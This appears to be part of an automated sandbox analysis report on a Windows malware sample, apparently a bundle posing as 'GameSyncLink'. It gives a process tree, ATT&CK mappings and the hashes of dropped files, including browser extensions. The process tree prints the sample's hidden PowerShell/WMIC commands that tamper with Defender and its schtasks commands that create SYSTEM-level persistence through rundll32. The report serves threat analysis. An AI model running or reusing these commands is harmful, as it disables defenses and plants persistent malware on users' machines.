    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4776
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5144
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1508
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:3936
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\TiLdHs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\rJjsUio.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5676
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5668
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\GLicpnq.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4952
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\xWtQxEM.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1456
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\cGzCjfy.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\SquQMqi.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4796
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:1140

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\gqfhkSgh\bpCNAsm.dll",#1 /RgdidQmY 385118
1⤵
PID:3052
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\gqfhkSgh\bpCNAsm.dll",#1 /RgdidQmY 385118
  2⤵
  PID:5728
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
    3⤵
    PID:5684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe

Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

Filesize
2.5MB

MD5
e6943a08bb91fc3086394c7314be367d

SHA1
451d2e171f906fa6c43f8b901cd41b0283d1fa40

SHA256
aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

SHA512
505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe

Filesize
6.2MB

MD5
1bacbebf6b237c75dbe5610d2d9e1812

SHA1
3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

SHA256
c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

SHA512
f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

Download Submit
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

Filesize
13.2MB

MD5
72b396a9053dff4d804e07ee1597d5e3

SHA1
5ec4fefa66771613433c17c11545c6161e1552d5

SHA256
d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

SHA512
ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

Download Submit
C:\Program Files (x86)\GameSyncLink\installc.bat

Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat

Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
22c0f998c9b0079a169cfe80a9f03cf6

SHA1
4f262d8b03d462d28dfa5baf7e6f638aec3aaa39

SHA256
7b37d13d45d04f5adda6020febf0f7dbba9dcde98f8b541e6f17ac3405b84c23

SHA512
248afb4abb313a20b58989b0ae55d0f642f166ea1ac5810688b43842657643760dd53e8b7d0cd9fb072ca87595aff7085b12c8e45849ce19364997f676a75a13

Download Submit
C:\ProgramData\AEBGIEGC

Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\KECGHIJD

Filesize
100KB

MD5
0b14313c1e653ba21ef8dec537b1628d

SHA1
4a3067f19b3c06dcb59963a4a574c757d0e7803d

SHA256
0b775a68679382a468971c84e9d3b735e0999acce5aedd8f9ebf2f009e205ae3

SHA512
1ac60cbb03f109340123f36a6fd6e63d25271a81b8fd761b905c0000ad5b7d6410871c26355085007954e8376a246c804162759731903589ee8cbab16b9bd7bb

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\be\messages.json

Filesize
202B

MD5
2f2efb9c49386fe854d96e8aa233a56f

SHA1
42505da3452e7fd4842ed4bd1d88f8e3e493f172

SHA256
a93a368b5c7023842f9d8b0ee5ef9638c03c808212efefadf7331d3b65482ea3

SHA512
c9bd97f3487ab695dd9245a14058ed70b3be61b6bf21b281efe022a954c17d86208a4004e157ef892af84764ac290c6f97345a50ebeb9d11c16490979859b934

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\ca\messages.json

Filesize
146B

MD5
7afdcfbd8baa63ba26fb5d48440dd79f

SHA1
6c5909e5077827d2f10801937b2ec74232ee3fa9

SHA256
3a22d19fd72a8158ad5ec9bfa1dcdf70fdb23c0dee82454b69c2244dfd644e67

SHA512
c9acb7850d6392cac39ed4409a7b58c31c4e66def628e9b22a6f5a6a54789e2c67c09427bd57de1ff196bf79eaf1d7dc7423ba32f1ab1764b5a25ef706cbc098

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\cs\messages.json

Filesize
154B

MD5
0adcbaf7743ed15eb35ac5fb610f99ed

SHA1
189e00f2a1f4ebc7443930e05acc3dcb7ac07f3b

SHA256
38af7c2222357b07b4e5f0292d334d66f048c12f1c85ca34215104baa75bc097

SHA512
e2e4fd47bb3625d050b530bc41df89501832d5a43e4bb21efea0102a6d04c130cd5b7a4e4cafdac99344eb271401c6e6f93440e55d77013695c1ab3bba1b4a89

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\da\messages.json

Filesize
146B

MD5
372550a79e5a03aab3c5f03c792e6e9c

SHA1
a7d1e8166d49eab3edf66f5a046a80a43688c534

SHA256
d4de6ea622defe4a521915812a92d06d29065dacb889a9995a9e609bb02f2cfb

SHA512
4220dfce49f887bf9bf94bb3e42172ae0964cfb642343a967418ff7855c9c45455754ebf68c17f3d19fc7c6eb2c1b4725103bc55c9c56715941740897c19575f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\de\messages.json

Filesize
155B

MD5
3c8e1bfc792112e47e3c0327994cd6d1

SHA1
5c39df5dbafcad294f770b34130cd4895d762c1c

SHA256
14725b60e289582b990c6da9b4afcbef8063eb3414f9c6020023f4d2bac7bb1e

SHA512
ce7c707e15725ffb73c5915ee6b381ca82eda820ae5ec2353a4e7147de297f6367945b34010b4e4c41d68df92a4ccf9a2b5df877f89526ca6b674bae00cabe9e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\el\messages.json

Filesize
180B

MD5
177719dbe56d9a5f20a286197dee3a3b

SHA1
2d0f13a4aab956a2347ce09ad0f10a88ec283c00

SHA256
2e2ae3734b84565b2a6243fe4585dd6a0f5db54aae01fa86b6f522dd1ff55255

SHA512
ff10ae14ce5f7ed9b0612006730f783e1033304e511ccf9de68caeb48cc54e333c034f14cac63c3ea07c84a8f0f51c7f929b11d110913fa352562d43947798b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_TO\messages.json

Filesize
2.0MB

MD5
f5ddd2db3668536e63eb3959d1f341f0

SHA1
43ec3ca6054f2d8eddc78cde7ed7a20c76b8149e

SHA256
aced0a9d48c228390d1a6fbb15f337fa92954af3d3b81d1bbaa249330e613f90

SHA512
94dcfa77dbb415ed2059ccbfa9a8e85eba4651c9c60374cdcbb9356999b838940ad0ebdbaaf3428f81ad5a35d12f6dc09b214196a436b5e988bc3a1781a39e5f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_TO\messages.json

Filesize
2.0MB

MD5
3533e3cedbe1c7fd66eebe365b7f9721

SHA1
c3a9859de596a27f12300e165516cea625377fa0

SHA256
acce54f34b77acc4952af6110f4949990563b6d688868d77609745d0a6a53e05

SHA512
efe2d7d80d82c3c4f2c2a564e206b8419bd802657adfe5b6072cd448b9ca745b5538d4a34e0af66c99713abb10b60bce15b338e2446060f4de6be0d7c4902813

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\et\messages.json

Filesize
161B

MD5
4ebb37531229417453ad13983b42863f

SHA1
8fe20e60d10ce6ce89b78be39d84e3f5210d8ecd

SHA256
ff9d868d50e291be9759e78316c062a0ec9bcbbb7c83b8e2af49a177dda96b22

SHA512
4b7987c2fb755bbc51d5a095be44457f0188b29964e9820156903d738398d2b7f2c95629a40abdca016e46cad22a99c35039ee784c01860dab44f4b7d02a5980

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fi\messages.json

Filesize
151B

MD5
0c79b671cd5e87d6420601c00171036c

SHA1
8c87227013aca9d5b9a3ed53a901b6173e14b34b

SHA256
6e13de5626ff0cb1c1f23b3dde137fcfc82f3420e88689b9e8d077ab356122ac

SHA512
bf956a7627feced1f6dba62fcfc0839a32573c38de71a420e748ce91e2a5e4f93dab67405174ba0d098ea7c1f66fb49b5a80d4f5d1ddc0fc2b08d033656d0e25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fr\messages.json

Filesize
154B

MD5
6a9c08aa417b802029eb5e451dfb2ffa

SHA1
f54979659d56a77afab62780346813293ad7247b

SHA256
8f4ed00e79b8e990a32282eea13f8e1d0faa9cf8b21168643455b206e4e3d08c

SHA512
b5a504b5559d0e955a5a3cf2e0ae37a64cdad75aaa7c82d01757d4a2f541026dbfb1cb8373c932a0e003f1951e88e2f5a3fb7fc9992d67388f7184f00a8c1402

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\hu\messages.json

Filesize
161B

MD5
eec60f64bdaa23d9171e3b7667ecdcf9

SHA1
9b1a03ad7680516e083c010b8a2c6562f261b4bb

SHA256
b4b490e4fe6eb83b9e54f84c9f50e83866e78d0394bcb03353c6e61f76d1ac34

SHA512
c0dda2afcaae5e44eda8462dc8536c4507c1087fc54b18fb40c2894784776cab46b1d383c3113c0e106612efe71b951672deecc01b0447956e1dced93cca42b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\it\messages.json

Filesize
144B

MD5
1c49f2f8875dcf0110675ead3c0c7930

SHA1
2124a6ac688001ba65f29df4467f3de9f40f67b2

SHA256
d6a6b8bb2706268726346d7cf12e2bc1e55dd9d730093de89d8962293b769cc0

SHA512
ab0da2797705a043fd4dfe5bd98c3d2a47d596ac9ac5edeaa709969615c4dab0514d83ae5a1ef226989c05e4603d614d0a22f70931c73216c36f6b493e5acc3f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\lt\messages.json

Filesize
160B

MD5
f46a2ab198f038019413c13590555275

SHA1
160b9817b28d3539396399aa02937d3e2f4796ac

SHA256
e01b215a6ef7446522b2701fc72888944d551627a331a6378a5a0b5c402fdc65

SHA512
5834ec16be2e3c7a6dc39d038d58a07adf5e842581fff80da92fe5b2c769e8e7db6f3dd69a90e5702535f5dfd6ab2787251dcfd0a0649149ab606f02c40e8c33

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\lv\messages.json

Filesize
160B

MD5
b676b28af1bc779eb07f2ad6fee4ec50

SHA1
36f12feab6b68357282fc4f9358d9e2a6510661a

SHA256
1ac599594e814cd69a4c7a8180d75fc8aad9c9af54e9411611b3c03a82947ef4

SHA512
d982861de053e3225af04377134013d596b1dc069d7faf27e087e19680b575af744a4d8bc8b32f858ed0e69a26527be3df1cd006da78695fbea3595c4259ee1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\mk\messages.json

Filesize
190B

MD5
616866b2924c40fda0a60b7988a1c564

SHA1
ca4750a620dac04eae8ff3c95df6fd92b35c62a7

SHA256
315e5ab70774f9b8247d3eae0a58e15bd3a32f8202e1f1b8ed90c2b2e633d865

SHA512
1fd19fd12c471f3b410fbe5dd39bee52795735985655840cb73ba2191a782c822253fe2e5d6fe7548d9e4f1d735845f07b5babed5141ca801ada60052a5fd8a3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\nl\messages.json

Filesize
152B

MD5
cb5f1996eceef89fb28c02b7eac74143

SHA1
df757b1cd3b24745d1d6fdb8538ceba1adf33e3e

SHA256
5895554b39c229627fdd2440f51ee87a6505056bde8e008746682738c42a307e

SHA512
667257911527d27d590b7940ed4ce687465d59ec8fca9d6aa06529a55a3e8139488745c13d77c92af8f94aa1908e5dcef941f0a23544d13529c66d38b25883c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\no\messages.json

Filesize
143B

MD5
43f1d4d731e2ab85a2fb653c63b4326e

SHA1
94f7d16dcf66186b6f40d73575c4a1942d5ca700

SHA256
1dcd3f41f085df98beea4609c2a3c07f2796e909c8bb342225d0c14a2e37d32a

SHA512
ec9473a8a06090167b727b923c745f58a59bd76fe2cf259d7b1603468c5bfe2eb3827e67c0247d9e5a6742ee06ac7558b8532bacc1519215d953ec529b1b3e43

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\ru\messages.json

Filesize
204B

MD5
f0f33cfa8b275803c1c69cc2e8c58b98

SHA1
653b3e8ee7199e614b25128e7f28e14bf8fd02cb

SHA256
c28dbe7f5b5e95ecbeda2fbd517dab12e51810ae1e76079c2bcfd7738b7ae24c

SHA512
1ee8d9015ffb5c68ce322b69e8f90454239385133a1ed123e9d4f0841eec92012e0dbffe64c9f2ebb60fd5efc6e1525be0491a7433b0a5b184af3fb44e1a60c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sk\messages.json

Filesize
161B

MD5
b1eb0ab05de1272667be2558dea84951

SHA1
dfa723146cba15c190cf19fb3d7c84ffa12cd302

SHA256
ee50762de69cb198e12982c1871ee4e7aaf1588b2dde683fe3946825c95adc73

SHA512
af110a7bc225c656e0a97c36555d67f3d0fb5884b8e2c9ab7565e5faa7987781fbf42e8020e30771b997aaba05540a2fa2eeb6c31798d275435c85e69014f546

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sl\messages.json

Filesize
145B

MD5
816d952fe0f9413e294b84829d5a6b96

SHA1
cfd774e6afe6e04158cc95bab0857a5e52251581

SHA256
5d12f8f83c157b62c22ccf5d66789855f9e08f63ca19890318ed3c6a9501538f

SHA512
dccf1e19401e2a7b1ce2f81d221da78b939e3912455a145baf4f4867e1e9c8c39136a70f7cd34d5c9f2cd22e87223a9246803b4c853f4736cb050554a56b1b83

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sq\messages.json

Filesize
154B

MD5
a84d08782b2ff6f733b5b5c73ca3ce67

SHA1
c3ee1bbc80a21d5c6618b08df3618f60f4df8847

SHA256
22737aee22639043d8ab244e633a42e37e6ac7cccd2e4103b9f8fccfbcecd0d6

SHA512
436b6bca82272f918341bf2ab673a101c106e048859a4cd204bf83313588d2e9db30c4b3a8b7053544305b3f7a6b905a6c35c226923eb93ca3d55e8a128fc1f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sv\messages.json

Filesize
147B

MD5
66cf0340cf41d655e138bc23897291d3

SHA1
fff7a2a8b7b5e797b00078890ec8a9e0ddec503d

SHA256
d41042f78b7838b63ae141da4f4a7f67ea3f8e0fab66ea5111a1482867cf6e2f

SHA512
6411dea0ac928463317ad3ef418ac2f01e8621f64e024cb43fab52b132e08c7aa205ffc97e99f31b8dd824d19a403e7befbf7848e4421f031ed0a0b9b12e2c52

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\tr\messages.json

Filesize
156B

MD5
e5c0575e52973721b39f356059298970

SHA1
b6d544b4fc20e564bd48c5a30a18f08d34377b13

SHA256
606c5c1d88157b4eed536e26d14f456ca05b3fdf5f30d1e0e30a52aaf2bbbf37

SHA512
dba47859af5e2462b6da0b397f333825704bd75a3453d3d86eee2a35a7c6535d290c240b0e6a85b9d472d0d952aa9cd48c6e3af7c79c02e0f09f6e9932c146dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\uk\messages.json

Filesize
208B

MD5
01f32be832c8c43f900f626d6761bbaa

SHA1
3e397891d173d67daa01216f91bd35ba12f3f961

SHA256
1faeed8ec9ba451ee06b42999695771fd8a400dd6e3a699b755824830852e4a0

SHA512
9db085d75fb794c20df7060f603a7ac34481de3ae00f1260cc8e5a8a510234f383f71a85db48b6e2d8f2042646c08dd93a91a39ffe990f660f3cb9147fa4d42a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\ficon128.png

Filesize
4KB

MD5
d2cec80b28b9be2e46d12cfcbcbd3a52

SHA1
2fdac2e9a2909cfdca5df717dcc36a9d0ca8396a

SHA256
6d38e0be2e6c189de3e4d739bae9986ee365a33baf99a9234e5c9effb44b791a

SHA512
89798889d41cfc687a31c820aea487722b04ea40f7fd07ce899a0e215b7b1703380188ba103825a4b863f8cbca76430bfc437705630f0bfcaffd50a78c2bb295

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon128.png

Filesize
3KB

MD5
77fbb02714eb199614d1b017bf9b3270

SHA1
48149bbf82d472c5cc5839c3623ee6f2e6df7c42

SHA256
2f5282c25c8829a21a79a120e3b097e5316ddbd0f866508b82e38766c7844dba

SHA512
ff5078d585a1ab3bd4e36e29411376537650acbcb937fdad9ac485a9dd7bcb0f593cc76672572a465eb79894ab6b2eddd6a3da21c165ab75c90df020d3e42823

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon16.png

Filesize
2KB

MD5
b307bd8d7f1320589cac448aa70ddc50

SHA1
aaed2bfa8275564ae9b1307fa2f47506c1f6eccf

SHA256
61b02a1fca992be08f1a3df547b29b424767d94702e4d99129c2f1ca2e67a113

SHA512
74883fec0c94233231d17461f36e9a5e99cd4e8c2726a918519a8025cb75aaaab92a8dee612470cc4e3cc361fc0c12f5778e016b1570792ac3f4bf0b3bcfb103

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon48.png

Filesize
3KB

MD5
49443c42dcbe73d2ccf893e6c785be7f

SHA1
3a671dcb2453135249dcc919d11118f286e48efc

SHA256
e7cf247ccb1b365cd7a14fadd85686b83a9e7b7728590547b8466cafcea757ee

SHA512
c98af48fcd71c59a8e76e74b5268e26ad8b3db9cb80edf0517b70bb4476881cbb4ec55b9c3fd858925ef2f2889679db81190a07b4fd7088179e74f1434cac678

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json

Filesize
758B

MD5
fc1014742ae6347954f0ececdf6e9997

SHA1
7681d05b7dab21959099c5a1a0a8d8014b130da0

SHA256
d8d040c8c63416378ca287fb7bc13ebaeaac5b4b5e938951b4e3e9592d56bbd1

SHA512
f71efea4e1375d63f12c3963255ab57d93ced90ae7918d093fc5dce34459d7fd6505ad4749fcccc21ba99a1fbe71ef8f311a3cf8ecae8ed75a7bd65c544e7988

Download Submit
